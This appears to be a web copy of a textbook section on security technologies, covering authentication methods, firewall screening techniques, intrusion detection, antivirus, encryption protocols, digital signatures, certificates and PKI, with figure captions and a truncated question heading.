Which feature of cryptography is used to prove a users identity and prevent an individual?

Technologies and Tools for Security and Control

Various tools and technologies used to help protect against or monitor intrusion include authentication tools, firewalls, intrusion detection systems, and antivirus and encryption software.

Access control consists of all the policies and procedures a company uses to prevent improper access to systems by unauthorized insiders and outsiders. Authentication refers to the ability to know that a person is who he or she claims to be. Access control software is designed to allow only authorized persons to use systems or to access data using some method for authentication. New authentication technologies include:

• Token: A physical device similar to an identification card that is designed to prove the identity of a single user.
• Smart card: A device about the size of a credit card that contains a chip formatted with access permission and other data.
• Biometric authentication: Compares a person's unique characteristics, such as fingerprints, face, or retinal image, against a stored set profile.

A firewall is a combination of hardware and software that controls the flow of incoming and outgoing network traffic and prevents unauthorized communication into and out of the network. The firewall identifies names, Internet Protocol (IP) addresses, applications, and other characteristics of incoming traffic. It checks this information against the access rules programmed into the system by the network administrator. There are a number of firewall screening technologies:

• Packet filtering examines fields in the headers of data packets flowing between the network and the Internet, examining individual packets in isolation.
• Stateful inspection determines whether packets are part of an ongoing dialogue between a sender and a receiver.
• Network Address Translation (NAT) conceals the IP addresses of the organization's internal host computer(s) to protect against sniffer programs outside the firewall.
• Application proxy filtering examines the application content of packets. A proxy server stops data packets originating outside the organization, inspects them, and passes a proxy to the other side of the firewall. If a user outside the company wants to communicate with a user inside the organization, the outside user first "talks" to the proxy application and the proxy application communicates with the firm's internal computer.

FIGURE 8-6 A CORPORATE FIREWALL The firewall is placed between the firm�s private network and the public Internet or another distrusted network to protect against unauthorized traffic.

Intrusion detection systems feature full-time monitoring tools placed at the most vulnerable points of corporate networks to detect and deter intruders continually. Scanning software looks for patterns indicative of known methods of computer attacks, such as bad passwords, checks to see if important files have been removed or modified, and sends warnings of vandalism or system administration errors.

Antivirus software is designed to check computer systems and drives for the presence of computer viruses. However, to remain effective, the antivirus software must be continually updated.

Vendors of Wi-Fi equipment have developed stronger security standards. The Wi-Fi Alliance industry trade group's 802.11i specification tightens security for wireless LAN products.

Many organizations use encryption to protect sensitive information transmitted over networks. Encryption is the coding and scrambling of messages to prevent their access by unauthorized individuals.

Two methods for encrypting network traffic on the Web are:

• Secure Sockets Layer (SSL): SSL and its successor Transport Layer Security (TLS) enable client and server computers to establish a secure connection session and manage encryption and decryption activities.
• Secure Hypertext Transfer Protocol (S-HTTP) is another protocol used for encrypting data flowing over the Internet, but it is limited to individual messages.

Data is encrypted by applying a secret numerical code, called an encryption key, so that the data are transmitted as a scrambled set of characters. To be read, the message must be decrypted (unscrambled) with a matching key. There are two alternative methods of encryption:

• Symmetric key encryption: The sender and receiver create a single encryption key that is shared.
• Public key encryption: A more secure encryption method that uses two different keys, one private and one public.

FIGURE 8-7 PUBLIC KEY ENCRYPTION A public key encryption system can be viewed as a series of public and private keys that lock data when they are transmitted and unlock the data when they are received. The sender locates the recipient�s public key in a directory and uses it to encrypt a message. The message is sent in encrypted form over the Internet or a private network. When the encrypted message arrives, the recipient uses his or her private key to decrypt the data and read the message.

Digital signatures and digital certificates help with authentication. A digital signature is a digital code attached to an electronically transmitted message that is used to verify the origin and contents of a message. Digital certificates are data files used to establish the identity of users and electronic assets for protection of online transactions. A digital certificate system uses a trusted third party known as a certificate authority (CA) to validate a user's identity. The digital certificate system would enable, for example, a credit card user and a merchant to validate that their digital certificates were issued by an authorized and trusted third party before they exchange data. Public key infrastructure (PKI), the use of public key cryptography working with a certificate authority, is a principal technology for providing secure authentication of identity online.

Figure 8-8

FIGURE 8-8 DIGITAL CERTIFICATES Digital certificates help establish the identity of people or electronic assets. They protect online transactions by providing secure, encrypted, online communication.